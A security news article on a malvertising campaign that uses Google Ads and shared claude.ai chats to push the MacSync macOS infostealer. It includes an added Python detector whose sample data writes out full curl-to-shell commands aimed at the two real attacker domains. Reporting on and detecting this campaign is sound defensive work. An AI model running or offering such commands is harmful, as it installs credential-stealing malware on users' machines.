Attackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on claude.ai to spread macOS infostealer malware. The campaign was identified by Burke Albayrak, a security engineer at Trendool Group, with BleepingComputer independently confirming a second active version that uses different infrastructure.
Users searching for "Claude Mac Download" may see sponsored Google search results directing them to Claude.ai, with the URL appearing legitimate. These links lead to publicly shared Claude chats that purport to be the official "Claude Code on Mac" installation guide from Apple Support. The chat instructs users to open a Terminal and paste a command, which silently downloads and executes the malware.
At the time of reporting, two different Claude shared chats involved in this attack were publicly accessible, each using different domains and payloads but sharing a similar social engineering approach.
How does the Claude.ai malvertising attack work?
The pasted command downloads a Base64-encoded shell script from an attacker-controlled domain. The version spotted by BleepingComputer fetches a script called loader.sh from bernasibutuwq2[.]com, while the one identified by Albayrak uses customroofingcontractors[.]com.
This loader runs entirely in memory, leaving minimal traces on disk. The server returns a uniquely obfuscated version of the payload for each request, a technique known as polymorphic delivery, which makes signature-based detection more difficult.
In one variant, the script profiles the victim before fetching the main payload:
- It checks whether the machine has Russian or CIS-region keyboard input sources configured. If so, the script exits and sends a sys_blocked status ping to the attacker's server.
- It also collects the external IP address, hostname, operating system version, and keyboard locale and reports them back to the attacker.
- It then downloads a second-stage payload that runs via osascript, macOS's built-in scripting engine, allowing the attacker to execute remote code without dropping a traditional binary on disk.
The version identified by Albayrak skips the profiling step and proceeds directly to execution. It collects browser credentials, cookies, and the contents of the macOS Keychain, then sends this data to the attacker's server. Albayrak attributes this variant to the MacSync macOS information-stealer family.
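The behaviours described above (a remote fetch piped into a shell, Base64 decoding of the fetched content, an inline osascript second stage, and the two attacker domains) are exactly what a defender would look for in shell-history or EDR process-event data. The following detector is an added example written for this page, not code from BleepingComputer, Albayrak, or the campaign itself; the rule names, weights, threshold and the sample command lines are constructed assumptions, and only the two domains come from the article. It also serves the later advice about pasted Terminal commands: the same scoring can be applied to a single command before anyone runs it.

```python
import re
from dataclasses import dataclass

# Domains named in the article (defanged there as bernasibutuwq2[.]com and
# customroofingcontractors[.]com), treated here as known-bad indicators.
KNOWN_BAD_DOMAINS = {"bernasibutuwq2.com", "customroofingcontractors.com"}

# Heuristic rules (names and weights are assumptions for this example).
# Each mirrors a behaviour the article describes: a remote fetch whose output
# ends up in a shell, Base64 decoding straight into a shell, an inline
# osascript stage, and a shell running the output of a command substitution
# that performs a remote fetch.
RULES = [
    ("remote_fetch_piped_to_shell", 3,
     re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("base64_decode_to_shell", 3,
     re.compile(r"\bbase64\s+(-d|--decode|-D)\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("osascript_inline_script", 2,
     re.compile(r"\bosascript\b\s+-e\b")),
    ("shell_runs_remote_command_substitution", 3,
     re.compile(r"\b(eval|bash|sh|zsh)\b[^|]*\$\((curl|wget)\b")),
]

DOMAIN_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


@dataclass
class Finding:
    line_no: int
    score: int
    rule_hits: list
    bad_domains: list
    command: str


def score_command(cmd):
    """Return (score, matched rule names, known-bad domains) for one command line."""
    hits = []
    score = 0
    for name, weight, rx in RULES:
        if rx.search(cmd):
            hits.append(name)
            score += weight
    domains = [d.lower() for d in DOMAIN_RE.findall(cmd)]
    bad = [d for d in domains if d in KNOWN_BAD_DOMAINS]
    score += 5 * len(bad)          # a known-bad domain alone is enough to flag
    return score, hits, bad


def scan_commands(lines, threshold=3):
    """Score every command line and return those at or above the threshold."""
    findings = []
    for i, cmd in enumerate(lines, 1):
        score, hits, bad = score_command(cmd)
        if score >= threshold:
            findings.append(Finding(i, score, hits, bad, cmd))
    return findings


# Constructed sample of process command lines, as an EDR or shell history
# might record them. Lines 1 and 4 imitate the article's delivery pattern;
# lines 2 and 3 are benign and should not be flagged.
SAMPLE_COMMAND_LINES = [
    'curl -fsSL https://bernasibutuwq2.com/loader.sh | base64 -d | bash',
    'osascript -e \'display dialog "Backup finished"\'',
    'ls -la /Users/example/Downloads',
    'bash -c "$(curl -fsSL https://customroofingcontractors.com/install.sh)"',
]


if __name__ == "__main__":
    for f in scan_commands(SAMPLE_COMMAND_LINES):
        print(f"line {f.line_no}: score={f.score} rules={f.rule_hits} "
              f"bad_domains={f.bad_domains}\n  {f.command}")
```

A single `osascript -e` invocation scores below the threshold on purpose, since it is common in legitimate automation; it only contributes once combined with a remote fetch or a known-bad domain. Because the article notes the payload is polymorphic, the rules deliberately match delivery behaviour rather than any byte pattern of the script itself.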
Why is this Claude.ai malware campaign difficult to detect?
Most malicious campaigns rely on look-alike domains that mimic the real product's website. In this case, the campaign uses the legitimate claude.ai domain, because the malicious instructions are hosted within Claude's own shared chat feature.
There are no spoofed URLs to flag as suspicious, and the destination domain shown in the Google ad is genuine. A similar campaign exploiting ChatGPT and Grok shared chats was reported in December.
How to Avoid Fake Claude Installation Malware
Avoid clicking on sponsored search results when searching for software downloads. Instead, go directly to claude.ai to access the official Claude app. Be wary of any instructions that ask you to paste Terminal commands, no matter where they appear.
The legitimate Claude Code CLI is available through Anthropic's official documentation and does not require pasting commands from a chat interface.
If a shared Claude chat prompts you to run a Terminal command attributed to support, treat it as malicious.
BleepingComputer contacted Anthropic and Google for comment ahead of publication. At this time neither company has issued any public statements regarding the abuse of shared chats and ad placements.